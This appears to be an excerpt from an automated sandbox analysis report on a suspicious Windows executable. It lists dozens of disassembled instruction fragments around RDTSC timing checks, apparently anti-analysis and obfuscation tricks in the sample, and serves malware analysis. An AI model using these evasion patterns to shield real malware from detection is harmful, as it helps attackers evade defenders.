              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70D6F7 second address: 70D6FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70ED03 second address: 70ED0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70ED0A second address: 70ED34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56AD341B1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 20D76359h 0x00000010 and esi, dword ptr [ebp+122D39B3h] 0x00000016 push 2E21B69Bh 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e pop edx 0x0000001f pop eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70EE86 second address: 70EEA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d jno 00007F56ACB76F36h 0x00000013 pop eax 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70F029 second address: 70F02D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70F02D second address: 70F031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70F3D6 second address: 70F3DB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70F86D second address: 70F877 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F56ACB76F36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70FCAD second address: 70FCB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71023B second address: 710245 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F56ACB76F3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710245 second address: 7102A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F56AD341B18h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 xor dword ptr [ebp+12451EB4h], ebx 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebp 0x0000002e call 00007F56AD341B18h 0x00000033 pop ebp 0x00000034 mov dword ptr [esp+04h], ebp 0x00000038 add dword ptr [esp+04h], 00000017h 0x00000040 inc ebp 0x00000041 push ebp 0x00000042 ret 0x00000043 pop ebp 0x00000044 ret 0x00000045 mov edi, dword ptr [ebp+122D3ABBh] 0x0000004b push 00000000h 0x0000004d push eax 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710CC9 second address: 710CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710AA7 second address: 710AB1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F56AD341B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710CCE second address: 710CD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 711BCF second address: 711BD4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 711BD4 second address: 711BE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 je 00007F56ACB76F44h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 711BE6 second address: 711BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 711BEA second address: 711C56 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F56ACB76F38h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000017h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 clc 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push edi 0x00000027 call 00007F56ACB76F38h 0x0000002c pop edi 0x0000002d mov dword ptr [esp+04h], edi 0x00000031 add dword ptr [esp+04h], 00000018h 0x00000039 inc edi 0x0000003a push edi 0x0000003b ret 0x0000003c pop edi 0x0000003d ret 0x0000003e mov dword ptr [ebp+122D3785h], edx 0x00000044 cld 0x00000045 push 00000000h 0x00000047 adc esi, 593E2896h 0x0000004d xchg eax, ebx 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 jmp 00007F56ACB76F3Eh 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 711C56 second address: 711C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 711C5B second address: 711C6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 711C6F second address: 711C89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56AD341B23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71269B second address: 7126A5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F56ACB76F36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71324A second address: 713250 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7132F7 second address: 7132FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7152ED second address: 7152F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7152F1 second address: 71533D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D3A63h] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F56ACB76F38h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c mov dword ptr [ebp+124521AAh], ecx 0x00000032 sbb di, F69Fh 0x00000037 push 00000000h 0x00000039 mov esi, dword ptr [ebp+122D3B3Bh] 0x0000003f xchg eax, ebx 0x00000040 push eax 0x00000041 push edx 0x00000042 jl 00007F56ACB76F38h 0x00000048 push edi 0x00000049 pop edi 0x0000004a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71533D second address: 715350 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F56AD341B18h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715350 second address: 715356 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71845A second address: 71849D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jng 00007F56AD341B16h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 mov di, si 0x00000014 push 00000000h 0x00000016 mov edi, dword ptr [ebp+122D17F7h] 0x0000001c push 00000000h 0x0000001e pushad 0x0000001f or dh, FFFFFFEBh 0x00000022 mov dword ptr [ebp+122D2DD2h], eax 0x00000028 popad 0x00000029 mov edi, dword ptr [ebp+124614F4h] 0x0000002f xchg eax, esi 0x00000030 pushad 0x00000031 pushad 0x00000032 js 00007F56AD341B16h 0x00000038 pushad 0x00000039 popad 0x0000003a popad 0x0000003b je 00007F56AD341B1Ch 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71849D second address: 7184AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jg 00007F56ACB76F36h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7194B1 second address: 719549 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56AD341B26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F56AD341B18h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 add dword ptr [ebp+12451EB4h], ebx 0x0000002d push 00000000h 0x0000002f or dword ptr [ebp+122D180Ch], esi 0x00000035 mov bx, 96E5h 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ebp 0x0000003e call 00007F56AD341B18h 0x00000043 pop ebp 0x00000044 mov dword ptr [esp+04h], ebp 0x00000048 add dword ptr [esp+04h], 00000016h 0x00000050 inc ebp 0x00000051 push ebp 0x00000052 ret 0x00000053 pop ebp 0x00000054 ret 0x00000055 call 00007F56AD341B1Dh 0x0000005a mov ebx, 0936C2D5h 0x0000005f pop ebx 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F56AD341B1Bh 0x0000006a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719549 second address: 719553 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F56ACB76F36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A480 second address: 71A48E instructions: 0x00000000 rdtsc 0x00000002 je 00007F56AD341B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715B03 second address: 715B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71862E second address: 7186B8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F56AD341B22h 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D3B67h] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a ja 00007F56AD341B1Dh 0x00000020 je 00007F56AD341B17h 0x00000026 cld 0x00000027 or edi, 781CA8F3h 0x0000002d mov dword ptr fs:[00000000h], esp 0x00000034 mov ebx, edx 0x00000036 mov eax, dword ptr [ebp+122D1179h] 0x0000003c push FFFFFFFFh 0x0000003e push 00000000h 0x00000040 push edi 0x00000041 call 00007F56AD341B18h 0x00000046 pop edi 0x00000047 mov dword ptr [esp+04h], edi 0x0000004b add dword ptr [esp+04h], 0000001Ch 0x00000053 inc edi 0x00000054 push edi 0x00000055 ret 0x00000056 pop edi 0x00000057 ret 0x00000058 add ebx, dword ptr [ebp+122D39B3h] 0x0000005e mov dword ptr [ebp+122D2116h], ebx 0x00000064 nop 0x00000065 je 00007F56AD341B28h 0x0000006b push eax 0x0000006c push edx 0x0000006d jnl 00007F56AD341B16h 0x00000073 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715B09 second address: 715B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71C302 second address: 71C359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 nop 0x00000008 movsx ebx, si 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F56AD341B18h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 push 00000000h 0x00000029 jmp 00007F56AD341B24h 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 push edx 0x00000032 jmp 00007F56AD341B22h 0x00000037 pop edx 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7186B8 second address: 7186BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71D3BE second address: 71D3C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71D3C2 second address: 71D3DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71E465 second address: 71E47A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jnl 00007F56AD341B18h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71F552 second address: 71F556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720627 second address: 72062E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71F684 second address: 71F688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71F688 second address: 71F699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push ebx 0x00000009 js 00007F56AD341B1Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7214C8 second address: 7214CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71F699 second address: 71F721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 nop 0x00000006 cld 0x00000007 push dword ptr fs:[00000000h] 0x0000000e sbb edi, 36CB38DBh 0x00000014 mov dword ptr fs:[00000000h], esp 0x0000001b jmp 00007F56AD341B1Eh 0x00000020 call 00007F56AD341B26h 0x00000025 mov edi, dword ptr [ebp+1244DAEBh] 0x0000002b pop edi 0x0000002c mov eax, dword ptr [ebp+122D13D9h] 0x00000032 ja 00007F56AD341B27h 0x00000038 jmp 00007F56AD341B21h 0x0000003d adc bx, EA22h 0x00000042 push FFFFFFFFh 0x00000044 mov edi, dword ptr [ebp+122D378Fh] 0x0000004a nop 0x0000004b ja 00007F56AD341B1Ch 0x00000051 pushad 0x00000052 push eax 0x00000053 pop eax 0x00000054 push edi 0x00000055 pop edi 0x00000056 popad 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jng 00007F56AD341B1Ch 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7214CE second address: 7214D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71F721 second address: 71F725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72255D second address: 722561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722561 second address: 7225DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F56AD341B18h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 jmp 00007F56AD341B1Dh 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push eax 0x00000030 call 00007F56AD341B18h 0x00000035 pop eax 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a add dword ptr [esp+04h], 0000001Ah 0x00000042 inc eax 0x00000043 push eax 0x00000044 ret 0x00000045 pop eax 0x00000046 ret 0x00000047 movsx edi, ax 0x0000004a mov bx, 591Ch 0x0000004e xchg eax, esi 0x0000004f pushad 0x00000050 push eax 0x00000051 jng 00007F56AD341B16h 0x00000057 pop eax 0x00000058 js 00007F56AD341B1Ch 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7217AC second address: 7217B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7235D7 second address: 7235DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7235DB second address: 7235E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7235E8 second address: 7235F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F56AD341B16h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7237DF second address: 7237E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72662F second address: 726633 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726633 second address: 726639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72773A second address: 727759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jo 00007F56AD341B16h 0x0000000b pop edx 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F56AD341B1Fh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727759 second address: 7277BB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F56ACB76F3Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F56ACB76F38h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 push 00000000h 0x00000027 mov edi, dword ptr [ebp+122D2848h] 0x0000002d push 00000000h 0x0000002f mov ebx, 150CFCF2h 0x00000034 xchg eax, esi 0x00000035 jmp 00007F56ACB76F45h 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d push esi 0x0000003e pushad 0x0000003f popad 0x00000040 pop esi 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727921 second address: 72792A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72792A second address: 72792E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7279F0 second address: 7279FA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F56AD341B1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7279FA second address: 727A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B0F3 second address: 72B0F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B0F7 second address: 72B0FD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B0FD second address: 72B11C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F56AD341B21h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B11C second address: 72B123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B123 second address: 72B133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F56AD341B1Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730ABB second address: 730AC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56ACB76F3Ah 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7303B8 second address: 7303D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 ja 00007F56AD341B16h 0x0000000b jmp 00007F56AD341B22h 0x00000010 pop ebx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73050E second address: 730513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730513 second address: 730529 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F56AD341B20h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730529 second address: 73052F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 735D3C second address: 735D46 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F56AD341B1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 739B26 second address: 739B4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F3Ah 0x00000007 jng 00007F56ACB76F38h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 ja 00007F56ACB76F36h 0x00000018 push edx 0x00000019 pop edx 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 739F8B second address: 739F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnc 00007F56AD341B16h 0x0000000c jnl 00007F56AD341B16h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73A0FE second address: 73A10B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F56ACB76F38h 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
